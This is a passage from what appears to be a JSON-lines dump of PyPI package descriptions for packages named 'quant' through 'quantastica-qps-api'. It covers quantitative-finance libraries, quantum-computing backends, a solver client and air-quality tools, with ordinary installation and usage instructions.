Quant should work on any recent Linux distribution.AboutQuant is a project of the Appropriate Software Foundation. Please refer to theQuant websitefor more information."} +{"package": "quant1x", "pacakge-description": "No description available on PyPI."} +{"package": "quant1x-base", "pacakge-description": "# base#### \u4ecb\u7ecd\nquant1x\u7cfb\u7edfpython\u57fa\u7840\u5e93"} +{"package": "quant1x-formula", "pacakge-description": "No description available on PyPI."} +{"package": "quant1x-qmt", "pacakge-description": "No description available on PyPI."} +{"package": "quant1x-trader", "pacakge-description": "# trader#### \u4ecb\u7ecd\npython\u5b9e\u73b0\u7684\u81ea\u52a8\u5316\u4ea4\u6613\u5458"} +{"package": "quant1x-xtquant", "pacakge-description": "# XtQuant#### \u4ecb\u7ecd\nXtQuant Lib(python for windows)#### \u8f6f\u4ef6\u67b6\u6784\n\u8fc5\u6295QMT\u5b98\u7f51\u4e0b\u8f7d\u5730\u5740: [http://docs.thinktrader.net/pages/633b48/](http://docs.thinktrader.net/pages/633b48/)"} +{"package": "quant23rg", "pacakge-description": "Welcome on the quant23rg packagequant23rg is python package for quantitative analysisInstall it by typing this command in your command promptpip install quant23rg==0.0.5The package is still in progressAuthor : Adrien Calas - Le23RayGorbella (Freelancer)Click here to contact by mail, Location : Paris and Nice, FranceLinkedinAvailable : european options pricing, implied volatilities, geometrical brownian motion for assets and portfolios, value at risk & conditional value at risk (work in progress for portfolio)European options pricingimportpandasaspdfromquant23rg.pricingCallEuropBSimportPricingCallEuropBSfromquant23rg.pricingPutEuropBSimportPricingPutEuropBSspy_opt=pd.read_csv(\"spy-options.csv\",).dropna()spy_opt.columns=[col+\"_call\"if\".1\"notincolandcol!=\"Strike\"elsecolforcolinspy_opt.columns]spy_opt.columns=[col.replace(\".1\",\"_put\")forcolinspy_opt.columns]spy_opt[\"IV_call\"]=spy_opt[\"IV_call\"].apply(lambdax:float(x.replace(\"%\",\"\"))/100)spy_opt[\"IV_put\"]=spy_opt[\"IV_put\"].apply(lambdax:float(x.replace(\"%\",\"\"))/100)spy_opt[\"Last_call\"]=spy_opt[\"Last_call\"].apply(lambdax:float(x))spy_opt[\"Last_put\"]=spy_opt[\"Last_put\"].apply(lambdax:float(x))call_example=spy_opt.sort_values(\"Volume_call\",ascending=False).iloc[0]# Last_call 27.9# Bid_call 27.85# Ask_call 28.18# Change_call 27.9# Volume_call 962# Open Int_call 2,741# IV_call 0.1815# Last Trade_call 05/26/23# Strike 410.0# Last_put 12.45# Bid_put 12.24# Ask_put 12.4# Change_put 12.45# Volume_put 1,234# Open Int_put 20,292# IV_put 0.1831# Last Trade_put 05/26/23# Name: 47, dtype: objects0=420.02# 29 may 2023dt=146/252# in years, expiration date : 20 october 2023call_pricing=PricingCallEuropBS(s0=s0,strike=call_example.Strike,dt=dt,interest_rate=0.05*dt,# fed rate multiplied by our period of timevolatility=0.1326,)call_pricing.payoff_sigma_fixed()put_pricing=PricingPutEuropBS(s0=s0,strike=call_example.Strike,dt=dt,interest_rate=0.05*dt,# fed rate multiplied by our period of timevolatility=0.1326,)put_pricing.payoff_sigma_fixed()Implied volatilities### See volatility smile (Strike -> IV(Strike)) ###fromquant23rg.implied_volatilityimportImpliedVolatilityivs=ImpliedVolatility(s0=s0,strike=call_example.Strike,dt=dt,interest_rate=0.05*dt,# fed rate multiplied by our period of 
timevolatility=0.1326,)ivs.show_implied_vol_and_compare(marketPrices_call=spy_opt[\"Last_call\"].tolist(),marketPrices_put=spy_opt[\"Last_put\"].tolist(),strikes=spy_opt.Strike.tolist(),marketVols=spy_opt.IV_call.tolist(),)Geometrical Brownian Motion for assets and portfoliosfromquant23rg.pricingGBMimportPricingGBM,PricingGBMPortfolioimportyfinanceasyfsp500=yf.Ticker(\"^GSPC\")hist_sp500=sp500.history(\"1y\")hist_sp500[\"returns\"]=hist_sp500.Close/hist_sp500.Close.shift(1)-1returns_serie=hist_sp500.dropna().returns#################################################### Pricing with Geometric Brownian Motion ###pricer=PricingGBM.create_pricing_GBM_from_time_series(hist_sp500.Close,nb_steps=100,maturity=1,returns=returns_serie,nb_simulations=1000,)pricer.simulate_and_see()Value at Risk & Conditional Value at Risk (work in progress for portfolio)### Value at Risk (one asset) ###fromquant23rg.riskManagementimportRiskManagementOneAssetrkManageHistoric=RiskManagementOneAsset(returns_serie,input_type=\"returns\")rkManageNormal=RiskManagementOneAsset(returns_serie,mode=\"normal\",)rkManageMonteCarlo=RiskManagementOneAsset(hist_sp500.Close,\"Monte-Carlo\",returns=returns_serie,input_type=\"value\")print(f\"VaR Historic 1 day :{rkManageHistoric.value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"VaR Normal 1 day :{rkManageNormal.value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"VaR Monte-Carlo 1 day :{rkManageMonteCarlo.value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"Cond-VaR Historic 1 day :{rkManageHistoric.conditional_value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"Cond-VaR Normal 1 day :{rkManageNormal.conditional_value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"Cond-VaR Monte-Carlo 1 day :{rkManageMonteCarlo.conditional_value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")#################################################### Value at Risk multiple assets (Cholesky) ###importyfinanceasyfimportnumpyasnpfromquant23rg.riskManagementimportRiskManagementPortfolio## Datas for the testsp500=yf.Ticker(\"^GSPC\")hist_sp500=sp500.history(\"1y\")aapl=yf.Ticker(\"AAPL\")hist_aapl=aapl.history(\"1y\")hist_sp500[\"returns\"]=hist_sp500.Close/hist_sp500.Close.shift(1)-1###############################@pf_risk_Test=RiskManagementPortfolio.init_and_instantiate_RK_PF(portfolio_time_series=np.array([hist_sp500.Close.tolist(),hist_aapl.Close.tolist(),]),interest_free_rate=0.05/252,mode=\"Monte-Carlo\",nb_days=1,input_type=\"value\",)print(\"Correlation matrix :\")print(pf_risk_Test.correlation_matrix)print(\"Value-at-risk 1 day\",pf_risk_Test.value_at_risk(nb_past_days=1,# not important hereconfiance=0.95,),)pf_risk_Test=RiskManagementPortfolio.init_and_instantiate_RK_PF(portfolio_time_series=np.array([hist_sp500.Close.tolist(),hist_aapl.Close.tolist(),]),interest_free_rate=0.05/252,mode=\"normal\",nb_days=1,input_type=\"value\",)print(\"Correlation matrix :\")print(pf_risk_Test.correlation_matrix)print(\"Value-at-risk 1 day\",pf_risk_Test.value_at_risk(nb_past_days=1,# not important hereconfiance=0.95,),)################################################"} +{"package": "quanta", "pacakge-description": "No description available on PyPI."} +{"package": "quantadex", "pacakge-description": "# Python Library for 
BitShares![](https://img.shields.io/pypi/v/bitshares.svg?style=for-the-badge)\n![](https://img.shields.io/github/release/bitshares/python-bitshares.svg?style=for-the-badge)\n![](https://img.shields.io/github/downloads/bitshares/python-bitshares/total.svg?style=for-the-badge)\n![](https://img.shields.io/pypi/pyversions/bitshares.svg?style=for-the-badge)\n![](https://img.shields.io/pypi/l/bitshares.svg?style=for-the-badge)\n![](https://cla-assistant.io/readme/badge/bitshares/python-bitshares)Stable[![docs master](https://readthedocs.org/projects/python-bitshares/badge/?version=latest)](http://python-bitshares.readthedocs.io/en/latest/)\n[![Travis master](https://travis-ci.org/bitshares/python-bitshares.png?branch=master)](https://travis-ci.org/bitshares/python-bitshares)\n[![codecov](https://codecov.io/gh/bitshares/python-bitshares/branch/master/graph/badge.svg)](https://codecov.io/gh/bitshares/python-bitshares)Develop[![docs develop](https://readthedocs.org/projects/python-bitshares/badge/?version=develop)](http://python-bitshares.readthedocs.io/en/develop/)\n[![Travis develop](https://travis-ci.org/bitshares/python-bitshares.png?branch=develop)](https://travis-ci.org/bitshares/python-bitshares)\n[![codecov develop](https://codecov.io/gh/bitshares/python-bitshares/branch/develop/graph/badge.svg)](https://codecov.io/gh/bitshares/python-bitshares)\u2014## DocumentationVisit the [pybitshares website](http://docs.pybitshares.com/en/latest/) for in depth documentation on this Python library.## Installation### Install with pip3:$ sudo apt-get install libffi-dev libssl-dev python-dev python3-dev python3-pip\n$ pip3 install bitshares### Manual installation:$ git clonehttps://github.com/bitshares/python-bitshares/$ cd python-bitshares\n$ python3 setup.py install \u2013user### Upgrade$ pip3 install \u2013user \u2013upgrade bitshares## Contributingpython-bitshares welcomes contributions from anyone and everyone. Please\nsee our [guidelines for contributing](CONTRIBUTING.md) and the [code of\nconduct](CODE_OF_CONDUCT.md).### Discussion and DevelopersDiscussions around development and use of this library can be found in a\n[dedicated Telegram Channel](https://t.me/pybitshares)### LicenseA copy of the license is available in the repository\u2019s\n[LICENSE](LICENSE.txt) file."} +{"package": "quantagonia-api-client", "pacakge-description": "Quantagonia API ClientThis package contains Quantagonia's CLI client and client-side APIs for using HybridSolver in the cloud.InstallationPython >= 3.8 is required. Then, dopython -m pip install quantagonia-api-clientIn order to use HybridSolver through Quantagonia's cloud system, you'll need to sign up for an API key and set it system-wide byexport QUANTAGONIA_API_KEY=Quick start: using the CLI clientThis package provides the scripthybridsolverto interact with the\ncloud solver. 
In order to solve a MIP (supported formats:.mps, .lp, .mps.gz, .lp.gz) or QUBO (spported formats:.qubo, .qubo.gz), just\nusehybridsolver solve path/to/example.mpswhich will automatically set all parameters and solver controls to their default value, which is a good compromise for many middle-sized\noptimization problems out there.Thesolvecall has a few options (tryhybridsolver solve --help) and will, after submitting the problem, stream the logs and output the\nsolution vector if one is found.To start a job without attaching to its log stream and leave it running in the background, usehybridsolver submit path/to/example.mpswhich supports the same parameters assolveand returns ajob_id.\nusing this ID, logs, results and job status as well as time billed can\nbe retrieved usinghybridsolver (logs | solution | status | time_billed) job_idLastly, in order to cancel a runnning job and avoid unnecessary\ncosts, usehybridsolver cancel job_id. To listkactive and/or past jobs,\nusehybridsolver list --n=k.Using the API client in your own codeThe capabilities of the API client include, but are not limited to:a plugin for PuLP to solve PuLP-generated models locally and in the client,a simple API to model QUBOs locally and solve them in the cloud andan importer to convert PyQUBO models into our format - allowing to solve PyQUBO models in QUantagonia's cloud.For starters, you can run the examples inexamples/through, e.g.,QUANTAGONIA_API_KEY=\"\" python examples/submit_qubo.pywith a valid Quantagonia API key.For more details, we refer to ourAPI reference."} +{"package": "quant-alchemy", "pacakge-description": "Table of contentsTable of contentsIntroductionInstallationDependenciesUsageContributingIntroductionQuant Alchemyprovide aInstallationThis package requires some dependencies to be installed.DependenciespandasnumpyscipyTo install the package, run the following command in your terminal.pipinstallquant_alchemyTo install all the dependencies, run the following command in your terminal.pipinstall-rrequirements.txtUsageA simple example of how to use the package is shown below.fromquant_alchemyimportTimeseries,Portfolio\"\"\"Suppose we have a dataframe with the following columns:- date: date of the stock price- close: opening price of the stock\"\"\"df=pd.read_csv(\"data/stock.csv\")# Create a timeseries objectts=Timeseries(df)# To see all the methods availableprint([tfortindir(ts)ifnott.startswith('__')])# To see how to use a methodhelp(ts.annualized_return)ContributingFor any bug reports or recommendations, please visit ourissue trackerand create a new issue. 
If you're reporting a bug, it would be great if you can provide a minimal reproducible example.Thank you for your contribution!"} +{"package": "quantamatics", "pacakge-description": "No description available on PyPI."} +{"package": "quantami", "pacakge-description": "No description available on PyPI."} +{"package": "quantan", "pacakge-description": "UNKNOWN"} +{"package": "quantanalysis", "pacakge-description": "testChange Log0.0.1 (15.05.2022)-First Release"} +{"package": "quant-analytics-flow", "pacakge-description": "No description available on PyPI."} +{"package": "quant-analytics-torch", "pacakge-description": "No description available on PyPI."} +{"package": "quantapp", "pacakge-description": "No description available on PyPI."} +{"package": "quantaq-cli", "pacakge-description": "QuantAQ Command Line Interface (CLI)This package provides easy-to-use tools to munge data associated with QuantAQ air quality sensors.DocumentationFull documentation can be foundhere.DependenciesThis tool is built for Python 3.6.1+ and has the following key dependenciespython = \">=3.8,<4.0\"\npandas = \">=1.0.4\"More details can be found in thepyproject.tomlfile at the base of this repository.InstallationInstall from PyPI$pipinstallquantaq-cliIt can also be added as a dependency using Poetry$poetryaddquantaq-cliIf you would like to install locally, you can clone the repository and install directly with Poetry$poetryinstallTestingAll tests are automagically run via GitHub actions and reports are uploaded directly to codecov. For results to these runs, click on the badges at the top of this file. In addition, you can run tests locally$poetryrunpytest--cov=./--cov-report=xml-rPDevelopmentDevelopment takes place on GitHub. Issues and bugs can be submitted and tracked via theGitHub Issue Trackerfor this repository.LicenseCopyright \u00a9 2020-2023 QuantAQ, Inc.Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License."} +{"package": "quantarhei", "pacakge-description": "QUANTArhei: Open Quantum System Theory for Molecular SystemsQuantarhei is a Molecular Open Quantum Systems Simulator written predominantly\nin Python. Its name is derived from the famous aphorism \u201cPanta rhei\u201d of the\nGreek philosopher Heraclitus of Ephesus. \u201cPanta rhei\u201d means \u201cEverything flows\u201d\nor \u201cEverything is in flux\u201d which is quite fitting when you change Panta into\nQuanta.In \u201cQuantarhei\u201d the last four letters (\u201crhei\u201d) should be written in Greek,\ni.e. 
(using LateX convention) \u201c\\rho \\epsilon \\iota\u201d.Quantarhei is in flux, but it already provides helper classes to define\nmolecules, their aggregates and their interaction with external environment.\nIt can calculate absorption spectra of individual molecules and their\naggregates and excitation energy transfer dynamics using various types\nof Redfield and Foerster theories.Quantarhei provides Python code (optimized with Numpy) for all its implemented\nmethods and theories, and allows extensions and replacements of the reference\nPython code with optimised routines written in C, Fortran or other lower level\nlanguages.In the first development stage, we concentrate on bringing to you tools\nto quickly build essential components of a quantum mechanical simulation,\nsuch as Hamiltonian, relaxation tensors, various initial\nconditions for density matrix etc.Quantarhei is at its experimental stage.\nCurrent version isQuantarhei is available in source form on GitHub and from PyPI for installation\nwith the pip command.AcknowledgementsThe work on Quantarhei is supported byNeuron Fund for Support of Sciencethrough the Impuls grant in physics 2014 (2015-2017)andCzech Science Foundation (GACR)through grants: 14-25752S (2014-2016), 17-22160S (2017-2019) and 18-18022S (2018-2020)New in 0.0.65for users:bug fixesNew in 0.0.64for users:use cases introduced for input filesbug fixesNew in 0.0.63for users:bug fixesNew in 0.0.62for users:_input_file_ variable defined in scripts run through qrhei run commandassert_version() function definedbug fixesNew in 0.0.61for users:bug fixesNew in 0.0.60for users:bug fixesNew in 0.0.59for users:bug fixesNew in 0.0.58for users:Many bug fixesNew in 0.0.57for users:Bug fixesNew in 0.0.56for users:Bug fixesNew in 0.0.55for users:A bug in 2D lineshapes of ESA calculated by MockTwoDSpectrumCalculator fixedOther bug fixesNew in 0.0.54for users:TwoDSpectra can be added if they are of the same typeBug fixesNew in 0.0.53for users:Improved handling of rotating wave approximation (RWA) for density matrix and the state vectorBug fixesNew in 0.0.52for users:Improved control over parallelization from command line byqrheioptionsParallelization over multiple nodsBug fixesNew in 0.0.51for users:Bug fixesNew in 0.0.50for users:Some improvement of theqrheidriverImproved logging capabilities; standard print function can be replaced printlog functionBug fixesNew in 0.0.49for users:Runnable .yaml configuration filesBetter diagnostics of errors occuring while running a script by qrhei driverNew qrhei subcommand file, which shows information about files saved by QuantarheiBug fixesfor developers:Started work on a script compiler qtaskNew in 0.0.48for users:Bug fixesNew in 0.0.47for users:Bug fixes2D spectra can be shifted in its axis by less then the frequency step (interpolated shift)New helper class Input to simplify configuration of user scripts by \u201c.yaml\u201d or \u201c.json\u201d filesNew in 0.0.46for users:A bug introduced in 0.0.45 in 2D spectrum calculations now fixedMost of the classes can now be copied (.copy() for a shallow copy, .deepcopy() for a deep, recursive copy)Improvements of 2D calculations with dressed statesVibronic example of 2D spectrum calculation extendedClass migration: TwoDSpectrum -> TwoDResponse; TwoDSpectrumContainer -> TwoDResponseContainerNew classes TwoDSpectrum and TwoDSpectrumContainer are simpler and contain only one type of spectraClass migration: MockTwoDSpectrum -> MocjDefinitions of positive and negative frequencies in omega2-frequency 
maps changed to correspond to literatureFor developers:many constants describing non-linear response, 2D spectra and data are defined on the highest quantarhei import levelAll Saveable objects now have a convenience methods copy() for shallow copying, deepcopy() for deep copying and scopy() for a deep copy by saving to and loading the object from a temporary fileNew in 0.0.45For users:Improved ability to calculate and analyze 2D frequency mapsget_Fourier_transform method of DFunction accepts a windowing function, which works the same as the one of TwoDSpectrumContainerCalculation of effective lineshape pump-probe spectraSaving of TwoDSpectrum data into text files (.dat, .txt), numpy formats (.npy, .npz) and Matlab files (.mat) is enabledProblem which caused Redfield and Lindblad operators not to transform to correct basis when represented by operators was fixedProblem which caused Liouville pathways to be calculated with site basis evolution superoperator was fixedoperator_factory class of Harmonic oscillator now fixed to return correct shift operator for complex inputsoperator_factory is now available from quantarhei.models.HarmonicOscillator packageSome small bug fixesFor developers:Failing documentation compilation fixed and adjusted to new version of matplotlibNew in 0.0.44For users:Basic implementation of HEOMSome bug fixesNew in 0.0.43For users:PureDephasing super-operator to allow additional pure dephasing for realistic lineshapes in effective lineshape description of time-resolved experimentsEmpty relaxation superopetator (as an empty Lindblad form) introduced (as a temporary fix to allow pure dephasing dynamics only)Consistent calculation of pure dephasing of non-optical coherence elements of the density matrix from effective lineshape theory (including electronic only dephasing in vibrational-electronic systems)Some bug fixesNew in 0.0.42For users:Improved effective lineshapes for 2D spectrum calculationsCalculation of absorption spectrum using first order Liouville pathwaysSome bug fixes including an frequency factor in absorption spectrumNew in 0.0.41For users:Some bug fixesBetter Louville pathway manipulation featuresNew in 0.0.40For users:Some bug fixesMinor new featuresNew in 0.0.39For users:Some bug fixesNew in 0.0.38For users:Some bug fixesNew in 0.0.37For users:Some bug fixesFor developersSome unused files removedMore precise dependencies on other packages specified in setupNew in 0.0.36For users:Quantarhei now available also as a conda packageRecommended installation procedure documentedTwoDSpectrum class revised - new method names, better storage model (keeps track of rephasing and non-rephasing part, groups of pathways associated with different processes when required, stores different pathways separately when required)Improved TwoDSpectrumContainer (can hold a group of spectra identified by an arbitrary ValueAxis (most notably TimeAxis and FrequencyAxis), integer index or list of strings). Copies the new storage improvement on TwoDSpectrum.labsetup class changed to LabSetup and extended by information about pulse profiles and spectra. 
labsetup is left as deprecated for compatibilityFourier transform of 2D spectra in t2, via TwoDSpectrumContainer; also enables FFT with window functionFunctions of ValueAxis introduced in a special module; Tukey window function for FFT in waiting time is one of themSuperOperator is BasisManaged; basis management is solved for both time-dependent and time-independent super operatorsRelaxationTensor now inherits from SuperOperator and it is BasisManaged through that inheritanceEvolutionSuperOperator tested, documented and it is BasisManagedEvolutionSuperOperator\u2019s method apply() can be applied with time argument which is of type TimeAxis type, float or array of floats; returns DensityMatrix or DensityMatrixEvolutionQuantarhei driver qrhei changes format: use \u2018qrhei run scriptname\u2019 to run scripts and consult the -h option of \u2018qrhei run\u2019; parallel runs untested in this versionDocumentation contains a description of the concept of \u201cuser\u201d, \u201cadvanced\u201d, and \u201cexpert\u201d levels of classes in Quantarhei.List of classes completely covered by documentation and doctests included in on-line documentationClasses Mode, SubMode, Molecule, TwoDSpectrumContainer completely documentedDocumentation enhancedCountless small improvements and bug fixesFor developers:Code of conduct file now in the root directory of the packageAbsorption spectroscopy related classes now organized in one file per class fashion so that automatic documentation is easier to readNew subpackage quantarhei.testing united all custom functions that support testing. It includes feature.py module previously found in quantarhei.dev subpacked (now removed) and a behave.py module which supports tests with behave packageBehave package is now used for some tests (in particular for tests of the \u201cqrhei\u201d driver). Future acceptance tests should preferentially be written with this packageNew helper script \u201cghenerate\u201d autogenerates Python step files for tests with \u2018behave\u2019 package from the Gherkin feature filesNew in 0.0.35For users:Method get_DensityMatrix() of the Aggregate class improved. It accepts some new options which makes specification of desired density matrix more flexibleExperimental implementation of circular and linear dichroisms and fluorescence spectraDocumentation is now available on readthedocs.org. A badgewhich informations about the status of automatic documentation builds was added to READMEMany small improvements and bug fixesFor developers:The code is now hosted on travis-ci.com and the builds are tested after every commit. Corresponding badgehas been added to READMEThe code is now hosted on codecov.com and its coverage by tests is measured. Corresponding badge showing the coveragehas beed added to READMENew in 0.0.34For usersSome issues with addition of bath correlation functions was fixedFirst entry in a database of literature bath correlation functions was created: the vibrational part of the FMO spectral density from Wendling et al., (2004)Aggregate can return a matrix of Franck-Condon factors (get_FC_factor_matrix())Aggregate can transform excited state site-basis shifted vibrational representation of an arbitrary operator to the unshifted (ground state) one (transform_2_unshifted(A, inverse=True/False) )Several new tested examplesRelaxationTensors (Redfield, Foerster, Lindblad, etc.) can now be multiplied by a constant or added (addition only if they are in tensor, i. e. 
not in operator, form)Tested examples can be fetched into IPython notebook or Python/IPython console by %example magic command or fetch_example function from quantarhei.wizard.magic moduleSmall improvements and bug fixesNew in 0.0.33For users:Evolution superoperators for relaxation tensors with constant coefficients (EvolutionSuperOperator class)Liouville pathway analysis including relaxation pathways (in Aggregate class)Small improvements and bug fixesFor developers:Aggregate class is broken into smaller pieces which snowball the functionality. Basic class is AggregateBase; new functions of this powerful class are defined in separate child classes. Aggregate class inherits from the whole chain of classesquantarhei.REAL and quantarhei.COMPLEX types should be now used for numpy arrays throughout the package. These types can be controlled and with it the used numerical precision and memory needsNew in 0.0.32For users:Electronic Lindblad form for vibronic Frenkel exciton modelPropagation with relaxation tensor (in particular Redfield and Time-dependent Redfield) in operator representation (where applicable it is much faster than with the tensorial representation)Redfield tensor and Time-dependent Redfield tensor can be calculated for a model with arbitrary number of vibrational statesAggregate can vibrationally trace arbitrary operator defined on its Hilbert spaceSmall improvements and bug fixesNew in version 0.0.31For users:Arbitrary time independent Lindblad formquantarhei.wizard module which contains IPython magic commands and some helpful Python console commandsSimulation templates which can be fetched into IPython notebooks or console by %template magic command (IPython) or fetch_template (console and IPython)Part of the test suit available for installed Quantarhei packageSome small improvements and bug fixesFor developers:Makefile is back in the package root directoryexamples directory depleted in favor of quantarhei/wizard/examples directoryNew tests under quantarhei/tests directory (mostly unit tests which contain plots)pytest required to run newtests with matplotlib plots"} +{"package": "quantasf", "pacakge-description": "QuantASFA Python package for computing chinese financial factors.Free software: MIT licenseDocumentation:https://quantasf.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.0.1 (2018-04-19)First release on PyPI."} +{"package": "quantastica-qconvert", "pacakge-description": "Quantum programming language converterConvert between quantum programming languagesMore goodies athttps://quantastica.comSupported languagesPython version ofquantastica-qconvertcurrently supports only:Qobj to pyQuilQobj to QubitToasterMore formats will be added soon.Until then, for more formats see:JavaScript version as command line tool:https://www.npmjs.com/package/q-convertJavaScript version as online web page:https://quantum-circuit.com/qconvertUsagefromquantasticaimportqconvertsource_code=...options={}converted=qconvert.convert(qconvert.Format.QOBJ,source_code,qconvert.Format.PYQUIL,options)print(converted)Detailsconvert(source_format, source_dict, dest_format, options)source_formatFormat.QOBJdest_formatFormat.PYQUILFormat.TOASTERoptionsDict:For all destination formats:all_experimentsFalse(default) only first experiment will be converted and returned as stringTrueall experiments form Qobj will be converted and returned as list of strings.create_exec_codeTrue(default) generated source code will contain 
command which executes circuit e.g.qc.run()shots(integer) ifcreate_exec_codeisTruethen generated code will performshotsnumber of samplesForPYQUILdestination:latticename of the backend (e.g. for pyQuil destination\"Aspen-7-28Q-A\").If ommited then \"Nq-qvm\" will be generated whereNis number fo qubits in the circuit.Special values:\"qasm_simulator\"will produce \"Nq-qvm\" backend\"statevector_simulator\"will produce WaveFunction simulator codeas_qvm(defaultFalse) ifTrueQVM will mimic QPU specified by lattice argument.ForTOASTERdestination:No options yetThat's it. Enjoy! :)"} +{"package": "quantastica-qiskit-forest", "pacakge-description": "Forest backend for QiskitAllows runningQiskitcode onRigettisimulators and quantum computers by changing only two lines of your Qiskit code.More goodies athttps://quantastica.comInstallpip install quantastica-qiskit-forestUsageImportForestBackendinto your Qiskit code:from quantastica.qiskit_forest import ForestBackendAnd replaceAer.get_backendwithForestBackend.get_backend.ExamplefromqiskitimportQuantumRegister,ClassicalRegisterfromqiskitimportQuantumCircuit,execute,Aer# Import ForestBackend:fromquantastica.qiskit_forestimportForestBackendqc=QuantumCircuit()q=QuantumRegister(2,\"q\")c=ClassicalRegister(2,\"c\")qc.add_register(q)qc.add_register(c)qc.h(q[0])qc.cx(q[0],q[1])qc.measure(q[0],c[0])qc.measure(q[1],c[1])# Instead:#backend = Aer.get_backend(\"qasm_simulator\")# Use:backend=ForestBackend.get_backend(\"qasm_simulator\")# OR:# backend = ForestBackend.get_backend(\"statevector_simulator\")# backend = ForestBackend.get_backend(\"Aspen-7-28Q-A\")# backend = ForestBackend.get_backend(\"Aspen-7-28Q-A\", as_qvm=True)# ...# To speed things up a little bit qiskit's optimization can be disabled# by setting optimization_level to 0 like following:# job = execute(qc, backend=backend, optimization_level=0)job=execute(qc,backend=backend)job_result=job.result()print(job_result.get_counts(qc))PrerequisitesRunning on your local Rigetti simulatorYou need to installRigetti Forest SDKand make sure thatquilccompiler andqvmsimulator are running:Open new terminal and run:quilc -SAnd in one more new terminal run:qvm -S -cRunning on Rigetti quantum computerYou need to get access to RigettiQuantum Cloud Services(QCS)In your Quantum Machine Image (QMI) install this package and QiskitReserve aQPU latticeRun your code via QMI terminal or Jupyter notebook served by your QMIDetailsSyntaxForestBackend.get_backend(backend_name = None, as_qvm = False)Argumentsbackend_namecan be:any valid Rigetti lattice nameOR:qasm_simulatorwill be sent to QVM asNq-qvm(whereNis number of qubits in the circuit)statevector_simulatorwill be executed asWavefunctionSimulator.wavefunction()If backend name is not provided then it will act asqasm_simulatoras_qvmboolean:False(default)True: if backend_name is QPU lattice name, then code will execute on QVM which will mimic QPUThat's it. Enjoy! :)"} +{"package": "quantastica-qiskit-toaster", "pacakge-description": "Qubit Toaster backend for QiskitAllows running Qiskit code onQubit Toaster- a high performance quantum circuit simulator.Installpip install quantastica-qiskit-toasterUsageYou need to install and runQubit Toasterfirst. 
By default, this library expects Toaster running in server mode.Now import ToasterBackend into your Qiskit code:from quantastica.qiskit_toaster import ToasterBackendReplaceAer.get_backendwithToasterBackend.get_backend.ExamplefromqiskitimportQuantumRegister,ClassicalRegisterfromqiskitimportQuantumCircuit,execute# Instead:#from qiskit import Aer# Do:fromquantastica.qiskit_toasterimportToasterBackendqc=QuantumCircuit()q=QuantumRegister(2,\"q\")c=ClassicalRegister(2,\"c\")qc.add_register(q)qc.add_register(c)qc.h(q[0])qc.cx(q[0],q[1])qc.measure(q[0],c[0])qc.measure(q[1],c[1])# Instead:#backend = Aer.get_backend(\"qasm_simulator\")# Use:backend=ToasterBackend.get_backend(\"qasm_simulator\")# OR (to use statevector_simulator backend):# backend = ToasterBackend.get_backend(\"statevector_simulator\")# OR (to specify custom toaster_host and toaster_port params# default values are 127.0.0.1 and 8001 respectively):# backend = ToasterBackend.get_backend(# \"statevector_simulator\",# toaster_host=\"192.168.1.2\",# toaster_port=8888,# )# OR (to use it directly via CLI instead of HTTP API)# backend = ToasterBackend.get_backend(# \"qasm_simulator\",# use_cli=True)job=execute(qc,backend=backend)# To speed things up a little bit qiskit's optimization can be disabled# by setting optimization_level to 0 like following:# job = execute(qc, backend=backend, optimization_level=0)## To pass different optimization level to qubit-toaster use backend_options:# options = { \"toaster_optimization\": 3 }# job = execute(qc, backend=backend, backend_options=options)job_result=job.result()print(job_result.get_counts(qc))DetailsSyntaxToasterBackend.get_backend( backend_name = None,\n toaster_host=None, \n toaster_port=None, \n use_cli=False)Argumentsbackend_namecan be:qasm_simulatoronly counts will be returned (default)statevector_simulatorboth counts and state vector will be returnedIf backend name is not provided then it will act asqasm_simulatortoaster_host- ip address of machine runningqubit-toastersimulator (default: 127.0.0.1)toaster_port- port thatqubit-toasteris listening on (default: 8001)use_cli- if this param is set toTruethequbit-toasterwill be used directly (by invoking it as executable) instead via HTTP API. For this to work thequbit-toasterbinary must be available somewhere in system PATHToaster's backend_optionstoaster_optimization- integer from 0 to 70 - automatic optimization1 - optimization is off2..7 - optimization is on. 7 is highest optimization level.Running unit testsFirst startqubit-toasterin HTTP API mode:qubit-toaster -SRunning standard set of tests (excluding the slow ones):python -m unittest -vRunning all tests (including the slow ones):SLOW=1 python -m unittest -vSpecifying different toaster host/port:TOASTER_HOST=192.168.1.2 TOASTER_PORT=8001 python -m unittest -v -fRunning tests by using CLI interface instead of HTTP:USE_CLI=1 python -m unittest -v -fFind more goodies athttps://quantastica.comThat's it. Enjoy! :)"} +{"package": "quantastica-qps-api", "pacakge-description": "Quantum Programming Studio APIPython wrapper forQuantum Programming StudioHTTP API.Quick start1. Install QPS API package:pipinstallquantastica-qps-api2. Find your QPS API token:Loginto Quantum Programming Studio, go toProfile -> API Accessand copy your API token.3. 
